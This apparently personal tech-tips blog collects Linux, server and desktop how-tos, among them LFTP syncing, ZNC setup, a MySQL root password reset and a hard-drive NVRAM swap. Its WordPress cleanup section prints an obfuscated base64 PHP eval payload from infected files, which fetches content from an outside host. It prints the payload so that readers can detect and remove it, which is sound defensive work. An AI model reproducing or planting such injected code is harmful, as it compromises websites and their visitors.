howto

Sync servers using multiple streams with LFTP

If you have a remote server that you want to sync a directory you can use for example rsync, however rsync doesn’t offer the multi stream syncing and can be slower if you have many new files. The below solution uses lftp with 5 parallel streams to download and each stream is split into 10 separate segments. This is very helpful if you cannot max your download connection with regular methods and of course if the uploading server has enough bandwidth.

#!/bin/bash
login=your_username 
pass=your_password
host=sftp://download.redoem.com
remote_dir=/media/files/redoem/dir
local_dir=/home/redoer/downloads
 
trap "rm -f /tmp/syncserver.lock" SIGINT SIGTERM
if [ -e /tmp/syncserver.lock ]
then
 echo "Syncserver is running already."
 exit 1
else
 touch /tmp/syncserver.lock
 lftp -u $login,$pass $host << EOF
 set ftp:ssl-allow yes
 set mirror:use-pget-n 10 
 mirror -c -P5 --newer-than=now-15min --log=syncserver.log $remote_dir $local_dir
 quit
EOF
 rm -f /tmp/syncserver.lock
 trap - SIGINT SIGTERM
 exit 0
fi

The above sample should work for most cases – you just need to change the values of the variables (highlighted in red).

This part (–newer-than=now-15min) can be changed based on how old files you want to sync, for example if you synced the files 4 hours and you have new files in the last hour, you want to change this part to ONLY download the new files then change this part to be now-60min or more (but less than 4 hours in this example).

If you want to share from your local machine to the remote server, replace this line as (changed parts highlighted in red):

 mirror -R -c -P5 --newer-than=now-15min --log=syncserver.log $local_dir $remote_dir

Now save the above as a .sh file, example syncserver.sh and you can add it as a cronjob to run every 15 minutes or run it when you have new files.

*/15 * * * * /home/redoer/syncserver.sh >> /home/redoer/sync_cron.log 2>&1

ZNC in a DigitalOcean droplet

It is nice to have an IRC connection that is always available and that doesn’t have your home IP address exposed. With the ZNC setup you can then use your local IRC client (BitchX, irssi, HexChat etc) to connect to the ZNC and you will be able to see all the networks and channels it is connected to. This tutorial will explain how to setup ZNC on a $5/month DigitalOcean droplet (ref link) with Ubuntu 16.04.1. Of course this setup should work on any hosting and setup – DigitalOcean is just given as an example here.

Create a Droplet

1. Press on the Create a Droplet button once you are logged in your DO account

  • Select the OS image (Ubuntu 16.04.X), the Droplet size/price ($5/mo), data center region, add extra features, ssh key if you want that extra security and then press on Create Droplet

2. Login to your Droplet (box) and make sure everything is up to date

sudo apt-get update
sudo apt-get upgrade

Installation and Build of ZNC

1. Grab few essentials that are needed to compile the ZNC from source

sudo apt-get install build-essential libssl-dev libperl-dev pkg-config

2. Grab the latest ZNC source tar ball

cd /usr/local/src; sudo wget http://znc.in/releases/znc-latest.tar.gz

3. Extract the package and enter the directory

sudo tar -xzvf znc-latest.tar.gz; cd znc*

4. Configure the source system wide (you can use ./configure –prefix=$HOME/znc if you don’t want system wide)

./configure

5. Then, compile ZNC (might take few minutes)

sudo make; sudo make install

Configuration of ZNC

1. Create a new user on which we will run ZNC

adduser znc-admin

2. Switch to the new user

su znc-admin; cd ~

3. Start ZNC and its configuration

/usr/local/bin/znc --makeconf

4. Below is a sample configuration (ZNC version 1.6.4) – I highlighted in red all the config that I entered manually, the rest is the default values (what is given in the brackets [ ])

[ .. ] Checking for list of available modules...
[ >> ] ok
[ ** ] 
[ ** ] -- Global settings --
[ ** ] 
[ ?? ] Listen on port (1025 to 65534): 14125
[ ?? ] Listen using SSL (yes/no) [no]: yes
[ ?? ] Listen using both IPv4 and IPv6 (yes/no) [yes]: yes
[ .. ] Verifying the listener...
[ >> ] ok
[ ** ] Unable to locate pem file: [/home/znc-admin/.znc/znc.pem], creating it
[ .. ] Writing Pem file [/home/znc-admin/.znc/znc.pem]...
[ >> ] ok
[ ** ] Enabled global modules [webadmin]
[ ** ] 
[ ** ] -- Admin user settings --
[ ** ] 
[ ?? ] Username (alphanumeric): redoEm
[ ?? ] Enter password: 
[ ?? ] Confirm password: 
[ ?? ] Nick [redoEm]: 
[ ?? ] Alternate nick [redoEm_]: 
[ ?? ] Ident [redoEm]: 
[ ?? ] Real name [Got ZNC?]: Redo'Em
[ ?? ] Bind host (optional): 
[ ** ] Enabled user modules [chansaver, controlpanel]
[ ** ] 
[ ?? ] Set up a network? (yes/no) [yes]: 
[ ** ] 
[ ** ] -- Network settings --
[ ** ] 
[ ?? ] Name [freenode]: 
[ ?? ] Server host [chat.freenode.net]: 
[ ?? ] Server uses SSL? (yes/no) [yes]: 
[ ?? ] Server port (1 to 65535) [6697]: 
[ ?? ] Server password (probably empty): 
[ ?? ] Initial channels: #redoEm
[ ** ] Enabled network modules [simple_away]
[ ** ] 
[ .. ] Writing config [/home/znc-admin/.znc/configs/znc.conf]...
[ >> ] ok
[ ** ] 
[ ** ] To connect to this ZNC you need to connect to it as your IRC server
[ ** ] using the port that you supplied. You have to supply your login info
[ ** ] as the IRC server password like this: user/network:pass.
[ ** ] 
[ ** ] Try something like this in your IRC client...
[ ** ] /server <znc_server_ip> +14125 redoEm:<pass>
[ ** ] 
[ ** ] To manage settings, users and networks, point your web browser to
[ ** ] https://<znc_server_ip>:14125/
[ ** ] 
[ ?? ] Launch ZNC now? (yes/no) [yes]: 
[ .. ] Opening config [/home/znc-admin/.znc/configs/znc.conf]...
[ >> ] ok
[ .. ] Loading global module [webadmin]...
[ >> ] [/usr/local/lib/znc/webadmin.so]
[ .. ] Binding to port [+34125]...
[ >> ] ok
[ ** ] Loading user [redoEm]
[ ** ] Loading network [freenode]
[ .. ] Loading network module [simple_away]...
[ >> ] [/usr/local/lib/znc/simple_away.so]
[ .. ] Adding server [chat.freenode.net +6697 ]...
[ >> ] ok
[ .. ] Loading user module [chansaver]...
[ >> ] ok
[ .. ] Loading user module [controlpanel]...
[ >> ] ok
[ .. ] Forking into the background...
[ >> ] [pid: 19576]
[ ** ] ZNC 1.6.4 - http://znc.in

That is it – ZNC is now up and running!

Connect to ZNC with your local IRC Client

Now find the IP address from your Droplet and setup your IRC client to connect to it.

Example with HexChat:

After connecting to the ZNC all the networks and channels you have added will appear.

Enable higher screen resolution in VirtualBox (for Ubuntu)

This might work on other systems too, I tried it on Ubuntu 14.04.1.

In VirtualBox the screen for Ubuntu was very small and it was difficult to see what’s on the screen. To fix this issue, you need to install the following packages on the guest (VM) box:

sudo apt-get install virtualbox-guest-dkms virtualbox-guest-x11

If you get this error:

The following packages have unmet dependencies. virtualbox-guest-x11 : Depends: xorg-video-abi-15

You will need to remove this package (note: I am not sure what all this removes, it was a lot – use caution):

sudo apt-get remove libcheese-gtk23

Then install these

sudo apt-get install xserver-xorg-core-lts-trusty

And

sudo apt-get install xserver-xorg-core

Then try to install the virtualbox packages, as the first step:

sudo apt-get install virtualbox-guest-dkms virtualbox-guest-x11

Once they install properly, restart the VM and the screen should be normal size. You might need to increase the Display memory in VB before starting the VM.

Recover data from a damaged hard disk drive

I would like to begin this presentation by first stating that I am not an electronic technician. Nor do I have any more than a very basic understanding of hard disk drive technology. I have a basic understanding of computer technology and of electricity. You do not have to be uber skilled to do what I did.

I successfully retrieved lost data from a dead hard disk drive for a few cents more than $100. I had been quoted $590 and up by professional data recovery firms to do what I did. The following presentation is a brief summary of what I did and how it worked. I cannot guarantee it will work for everyone. I can advise you to be very careful if you try to do any of the things that I did because it is possible that you can so badly corrupt your drive that any data on it might be lost forever.

Before you begin, do what you are doing right now. That is, go on the Internet and read, read, read and then read some more.

BACKGROUND

The disk drive was accidentally exposed to water. The water caused the printed circuit board to dysfunction. My friend, the owner of the drive replaced it and gave it to me to try to recover his data if I could. The arrangements were I could keep the drive in exchange for any data I might be able to recover from it.

My preliminary assessment was that the data was most probably intact. The platters had never been opened or exposed to air in anyway. The printed circuit board was the only part of the drive that had been damaged as a result of the accident. I wrongly assumed that I could simply, “hot swap,” the circuit board that had stopped working for another one from some other drive.

The disk drive details:

Brand: Hitachi
HDD: 5K250-250
Model: HTS542525K9SA00
RPM: 5400
Power: 5v 700mA DC
Capacity: 250GB
Type: SATA
P/N: 0A54876
MLC: DA2010

Complete 2.5″ HDD, PCB has been unscrewed

I have a source locally that is involved in dismantling and recycling computers of all kinds. He advised me that from time to time he gets small SATA drives and he has to drill a hole in them to insure that no data can ever be retrieved from any of them. However he told me that would not stop him from giving me the printed circuit boards if I wanted them.

But when I told him about my project to recover data he told me that he was uncertain why but he was pretty sure that I could not simply hot swap boards between drives with any hope of retrieving data or resurrecting a dead drive. That opinion was further substantiated by another friend who provided me with the following Internet link to the HDD Guru Forum.

ACTUAL REPAIR PROCEDURE

The article on HDD Guru is also a basic primer that explains why it is not possible to simply hot swap one printed circuit board for another when trying to recover data. The key to understanding that is a thing called the NVRAM or the Non-Volatile Random Access Memory chip. While it would appear that two identical drives have identical circuit boards attached to them that is not totally true. It is true that the boards themselves do operate identically and removing one and replacing it with the other is a piece of cake involving a few tiny screws and some careful physical work.

PCB only, NVRAM removed and placed on top of another chip with scotch tape to avoid losing it

But the individual boards are unique in as much as all of the information about the specific hard disk drive is stored within the NVRAM chip. So while the boards will physically move from one drive to the next they will not operate unless the NVRAM chip is moved as well.

The above article includes two photos of the kind of printed circuit board I worked with including a highlighted diagram of where to find the NVRAM chip.

The first problem I addressed was moving that chip. From a casual glance at the dead drive that I had I knew that there was no way that I could ever dream of doing that type of board level electronic work. But here where I live I am familiar with a TV repair shop that has done circuit board work for me in the past when they removed and reinstalled IC circuit chips in an old Sony TV I owned.

I consulted the technician in that shop and he said that moving the NVRAM, which is basically an 8-legged EPROM or an Erasable Programmable Read Only Memory device, is an easy procedure. The NVRAM performs so that once it has been programmed the information contained in it remains non-volatile. So no matter if the power is turned on or off the data remains safe. The technician I spoke with in the TV shop advised me that he has to move those kinds of chips all of the time. It seems that in modern electronics often the new replacement part is unusable unless the original EPROM chip is removed from the old part and then soldered onto the new part. He estimated the labor cost for moving my NVRAM at $25.

The next problem I encountered was finding a donor drive. As I began this discussion I will remind you that I don’t have detailed hard disk drive knowledge. So I was kind of shooting in the dark. On the HDD GURU forums there are various discussions authored by learned individuals who speak of the various characteristics that must be matched between circuit boards. But given the gamble I was taking I determined to set my own standards as I attempted to match a donor drive to my dead drive.

I first determined that the physical description of the two drives had to match exactly (Hitachi, HDD:5K250-250, Model:HTS542525K9SA00). Next I decided that the part numbers for the printed circuit boards should also match because that would insure that the two boards would physically interchange with each other (p/n 0A54876). Finally, I decided that the MLC should also match (DA2010). I know that experienced technicians might suggest that there are other boards which would also interchange but I determined to play it safe and apply my own personal standards in selecting my donor drive.

I also note that there are other characteristics between my donor drive and my dead drive that did not match. There are a variety of numbers on both the hard disk drive enclosure as well as the two PCBs that do not match. I don’t know what those numbers mean but I assumed that if the basic information like the size of the drive, the numbers of heads, the speed, the voltage, the number of cylinders etc. all matched then the two boards would probably interchange. I also noted that if the model numbers, pin numbers, and MLC numbers matched those other characteristics should also match.

Finally, I needed a USB, SATA, hard disk drive enclosure in order to have a way to attach the repaired disk drive to my computer. There are countless numbers of them on the market and I bought mine for less than $10 from Amazon. Enough said.

When I was finally able to locate a donor drive, my cost was $55 plus freight. When it arrived the very first thing I did was record all of the characteristics about the two drives and the two PCBs so that they would not become confused during the exchange process. I then careful removed the individual PCBs using the standard static precautions employed in handling any electronic circuitry. Basically you should not touch the PCB except by the edges but there are many places on the internet that can help you understand the precautions in dealing with electrostatic discharge and how it can ruin a printed circuit board.

 

Bare HDD, no PCB

After I delivered the two printed circuit boards to the TV shop technician, I waited about a week to get them back. I advised the technician to retain the donor NVRAM as I supposed that if my experiment failed I could at least put it back and have one functional hard disk drive. But my concerns were unfounded. He was able to successfully exchange the NVRAM that matched my dead drive with the one that was on the donor drive PCB. When I swapped out my dead PCB with the donor PCB that now had my NVRAM chip soldered onto it, everything worked perfectly.

RECAP

Just to recap exactly what I did, I had a dysfunctional hard disk drive printed circuit board which had on it the NVRAM which had all of my disk drive’s data in it. I also had a printed circuit board which was functional but which had on it an NVRAM that contained data about that other hard disk drive. I had the technician exchange the two NVRAM chips so that the functional printed circuit board now had on it my data’s NVRAM chip.

For me the work involved finding a functional drive that matched, and then carefully removing the two circuit boards and safely packing them into electrostatic bags to deliver to the TV technician.

I was able to recover all of the lost data off of my friend’s hard disk drive. The drive functions perfectly and I am actually considering installing it in my laptop as it has a greater capacity than the drive I am currently using.

The final cost for the whole operation total just a bit more than $100. The expenses were as follows:

USB SATA hard disk drive enclosure ........ $  5.58
Used Hitachi donor drive .................. $ 55.00
Shipping for above ........................ $  6.00
TV technician labor fees .................. $ 35.00

Total charges ............................. $101.58

This was a guest post by TJD.

Recover MySQL root password on Linux and Windows

It happens that sometimes (after 2 days ๐Ÿ™‚ ) you forget the password for your root user on MySQL, well there are few steps to perform to recover it.

This was performed on version:

$ mysql -V
mysqlย  Ver 14.14 Distrib 5.1.61, for debian-linux-gnu (x86_64) using readline 6.2

The following steps need to be performed as root user, so either login with it or use sudo.

Step 1:Stop the MySQL service

$ sudo /etc/init.d/mysql stop

Step 2: Start the MySQL server without password

$ sudo mysqld_safe --skip-grant-tables &

Step 3: Connect to the MySQL server using the MySQL client

$ sudo mysql -u root

Step 4: Change the password for the root user

mysql> use mysql;
Database changed
mysql> update user set password=PASSWORD("YOUR_NEW_PASS") where user = 'root';
Query OK, 3 rows affected (0.01 sec)
Rows matched: 3ย  Changed: 3ย  Warnings: 0
mysql> flush privileges;
Query OK, 0 rows affected (0.00 sec)
mysql> quit
Bye

Step 5: Stop the MySQL server again

$ sudo /etc/init.d/mysql stop

Step 6: Start the MySQL server (normally) and test the new password

$ sudo /etc/init.d/mysql start
$ sudo mysql -u root -p

 

This should also work on Windows as well, you will just need to use different commands for start/stop of the MySQL deamon.

 

 

Surveillance system with Motion

There is a time when you are leaving your home empty and you don’t have an expensive security and alarm system. You need to be protected and be aware if there are any changes or visits that you do not approve of while you are gone. There is an easy way to achieve just that with Motion. What you need is:

  1. Linux OS (ex. Ubuntu)
  2. Motion (free)
  3. Webcam
  4. Internet (optional)
  5. Hosting (optional)
  6. Smartphone with data plan (optional)

After you have your computer ready, webcam installed and working, go and download the Motion project or use Ubuntu’s apt to get it (check to get the latest version):

sudo apt-get install motion

Run the program (Motion) with root privileges, like sudo motion, however please note that you should probably run it with sleep or cron, otherwise it will activate immediately and most probably detect you while you are exiting the room.

Now you are all set for the basic surveillance with just a webcam which will record when there is a movement in front of the camera, however there are some more advanced options which could help a lot.

Email you when there is movement detected

For this you will need to install sendmail and mutt, assuming you are on Ubuntu

sudo apt-get install sendmail mutt

The basic settings for sendmail are enough for most users, but if you are an advanced user feel free to modify it as you desire.

Open the file /etc/motion/motion.conf in your favorite text editor (ex. vim), then locate the text on_even_start value and change the value part with:

echo "This is the body of the message" | mutt -s "Motion has been detected" your@mail.com

If there is a ; (semi-colon) on the beginning of the row, remove it, also if there is any empty space before the on_event_start.

Sending images to a webserver

It would be good to have the images taken from the motion to a webserver so that you can check from a remote location what is there on the images and report to the police if needed.
Open the /etc/motion/motion.conf file again in a text editor and locate the text on_picture_save value and change the value part with:

scp %f user@yourdomain.com:/path/for/images/

If there is a ; (semi-colon) on the beginning of the row, remove it, also if there is any empty space before the on_picture_save.

Enable login without password on your webserver

You need to create a ssh key on your machine with the following

sudo ssh-keygen -t dsa

Upload the key to your webserver:

sudo ssh-copy-id -i /root/.ssh/id_dsa.pub user@yourdomain.com

Tips and tricks: if you have a LED light on your camera, put a plastic electrician tape (isolation tape) on it so that the camera is not noticeable. Also, make sure you have some light in the room, unless the camera has a feature for night vision.

Making rounded corners in GIMP

I bugged myself a little to create an image in GIMP which will have rounded corners. I tried with selection tools and everything else I could think of to no avail. Then I browsed trough the Filters selections and I found the script Round Corners. The image I created was initially like this (you can also import a picture):

Looks kinda dull and boring, so now we will make it with round edges and make it more interesting ๐Ÿ™‚

Click on the Filters -> Decor -> Round Corners… and a new window with settings will be shown.

NOTE: if the filter Round Corners is grayed-out and you cannot select it, it means that the image has Alpha channel, so you need to remove that. Go to Layer -> Transparency -> Remove Alpha Channel

The window with the settings should look like this

The default settings might not work for everybody, so you can test it how it transforms and what you need.

The options are pretty much self explanatory, so for example if you do not want any shadows just set the Shadow X/Y offset to 0, Work on copy will create a new file and will not modify the original, Add Background will put the new image on a background etc.

The default settings will generate an image like this

You can see the rounded edges, the shadow, the blur on the shadow and the background (white). Now the image looks much slicker and more modern.

Let me know if you have questions about this in the comments below.

Change default search engine in Firefox (in address bar)

The default search engine in Firefox is Google. There is a way to change it to whichever search engine you wish. In this post I will talk for transferring the default search from Google to DuckDuckGo. I am experimenting with DDG now and seeing if it will suit my needs better than Google.

Instant Search

For the instant search () you can easily add new search engines or select one on the go, there is even a GUI which will help you add new ones, remove and edit them

When you are on a website that offers search services, you will see a new entry “Add <site>” in the instant search list of engines, click it and it will be added automatically. So visit https://www.duckduckgo.com/ now to add it if you wish.

Default Search in Address Bar

The default search is the address bar (), instead of typing a URL, you type a search query and hit enter. The search query is then passed to your default search engine and the results are displayed on their website.

There is a way to modify the default search engine in Firefox, start by typing this in the address bar:

about:config

agree to the warning and in the search field enter the following:

browser.search.defaultenginename

It should show one row and the Value field should be Google. Double click on it, and enter the value of your desired default search engine (in this case DuckDuckGo).

Click OK and you are good to go.

Note: The search engine that you want to make as your default must be in the Instant Search list.

This is good for productivity if you are using multiple search engines, you can set them on each and search faster without distractions.

How to clean malware infected WordPress blogs

Yes, that happened to me. I had a pretty old version of WordPress for one website and it got attacked by somebody. From what I could tell it was an automated attack and it infected most of the .php files for the same user on the hosting.

How I found out about that was when I opened the website in Chrome a warning was shown instead of the website:

 

Note: You can also perform a free scan via Sucuri which will confirm if your website is infected and it also offers ways to clean it up.

The following will be reported if infected:

Don’t panic, investigate!

First thing I did is panic. After panicking for ~5 minutes I realized that I should calm down and start investigating the issue and how many of my websites are affected. I opened all of them in Chrome and only 3 were infected. I opened the source code to see what the code looks like that is causing problems. Note: DO NOT OPEN THE INFECTED LINK, it will infect your machine (especially if you are on Windows).

The code was a path to the infested website enclosed in <script> tags. Nothing was shown in Firefox though, that is why I didn’t see the problem earlier. I assume Firefox has some built-in protection against scripts to external hosts.

Next step was to open the .php files on my server and see the code that is producing the script to the external website. It was on top of the file and it was base64 encoded string, which looked like this:

/**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYJF9TRVJWRV
JbJ21yX25vJ10pKXsgICRfU0VSVkVSWydtcl9ubyddPTE7ICAgIGlmKCFmdW5jdGlvbkk5Y3VybF83
NzcoJHVybCk50ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlmb3Blbl8Nz
coJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9zb2NrBlb
l83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRy2tl
dF83NzcoJHVybCk7aWYoJbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7cmV0dXJuICgIGZ1bmNttr
0aW9uIHRyeWN1cmxKCR1cmwpe2lmKGZas1bmN0aW9uXsf2V4aXN0cygnY3Vybyk9PT1mYWxzZSlyZX
R1cm4gZmFsc2U7JGNoID0gYl0ICgpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVJMLCR1cmwpO
2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpO2N1cmxfc2V0b3B0ICg
VUkxPUFRfVElNRU9VVCwgNSk7Y3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOyRyZ
XN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7Y3VybF9jbG9zZSgkY2gpO2lmICgkcmVzdWx0PT0iIilyZXR
1cm4gZmFsc2U7cmV0dXJuICRyZXN1bHQ7fSAgZnVuY3Rpb24gdHJ5ZmlsZV83NzcoJHVybCl7aWYoZ
nVuY3Rpb25fZXhpc3RzKCdmaWxlJyk9PT1mYWxzZSlyZXR1cm4gZmggsdaefhyjhEgsrrgmV0dXJuI
CRidWY7fSAgZnVuY3Rpb24gdHJ5Zm9wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZm9
wZW4nKT09PWZhsfaXJldHVybiBmYWxzZTskYndfsdyRmPUBmb3BlbigkdXJsLCdyJyk7aWYgK"));?>

If you are on a Linux machine or have Cygwin installed you can decode the string and see what it actually does by using the following command:

echo "ABOVE STRING GOES HERE" | base64 -d

Echo is used for security so that nothing is executed by mistake.

Make backups

Now that we know what the issue is, make a backup from the website and the database. Don’t worry that the files are still infected, better have infected files than no files at all in case something terrible happens ๐Ÿ™‚

Unless you already have some method to create frequent backups, use simpler method now. Delete all the unwanted themes, plugins, empty cache if using caching plugin, then login to your hosting (S/FTP) and copy all the files from your host to your local machine. Login to your database and create full export of your database schema.

Clean-up

Unless you got Sucuri to perform the cleaning for you, these are some manual steps you can perform to clean your website.

1. Install a plugin to scan

There is a plugin called Exploit Scanner to scan your WordPress installation. It works for WordPress 3.3+ so if you have something older you will need to skip this step. If you have 3.3+, you can install it and perform a scan (in most cases default settings are good) which will inform you which files are (most likely) infected. There will be some legit decode/eval functions in the code, so you should just check for the ones that have base64 encoded strings (like explained above).

When the scan is completed you can see which files are infected and then you manually correct them.

2. Manually scan all the files

If you are on a Linux machine or have Cygwin on Windows you can execute the following to identify which files are infected

cd backedup_folder_from_above
find . | xargs grep -i decode

This will print all the files that have the wordย decode in them, and you will be able to recognize the infection by being on the top of the file with base64 encoded string. If you are not sure for some files, you can always check the encoded string by using the echo method explained above.

3. Manually remove the infected code

Now that we have identified which files are infected (either by the plugin or the manual scan), it is time to clean up the website. Modify the infected files by deleting the malware lines, in the example above from /**/ to php after the encoded string. If you modify the local files on the computer, when you are finished you need to upload them on the server to the correct paths and overwrite the existing ones. Easier way would be to open the files directly from the server (via your FTP client) modify them and save the changes.

When you are done with all the files and they are successfully uploaded on your server, perform another scan with Exploit Scanner and/or manual scan (note: for this second scan you need to create a new backup from the entire website in a new location and scan there). Make sure there are no infected files left.

Final steps

Now that the site is clean there are some final steps that must be performed so that you avoid problems like this in the future.

  1. Update your WordPress installation to the latest version
  2. Update all your plugins or at least the active ones
  3. Update your theme (please note, some themes when updated will overwrite all your custom code)
  4. Change your WordPress secret keys (get them here) in your wp-config.php file (more info here)
  5. Change the passwords for all the users in WordPress and make sure there are no new users created
  6. Change the password(s) on your database and change the password in wp-config.php as well
  7. Make sure the .htaccess file in the root directory of your blog has not been modified. Unless you have modified it, it should look like this
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

Note: there could be something else added by your hosting, plugins etc, so double check before modifying it.

After you have done all these steps, go to Sucuri again and Re-Scan your site to make sure that everything is gone. If you are clean you need to get something like this:

That would be all, now go and write some posts on your clean blog ๐Ÿ™‚

Restore files in Windows 7

If you happen to be using Windows 7 and you delete a file by mistake (or changed your mind ๐Ÿ˜‰ ), there is an easy way to restore it.

  1. Go to the folder that has the file
  2. Right click in it (on the empty surface, not on an icon)
  3. Click Properties
  4. Click the tab called Previous Versions
  5. Locate the file that you want to restore

These files are created based on when Windows is performing System Restore points so you might want to modify those settings if you are more advanced user. They are performed on every restart by default, certain periods of the day, after installing some application etc.

The above can be performed also on a file that has been modified but it is still present:

  1. Right click on the file
  2. Select Properties
  3. Click the Previous Versions tab
  4. Select the version you want to restore

This restore procedure will work on all kind of files, database files, Word documents, text files, images etc.

Go to Top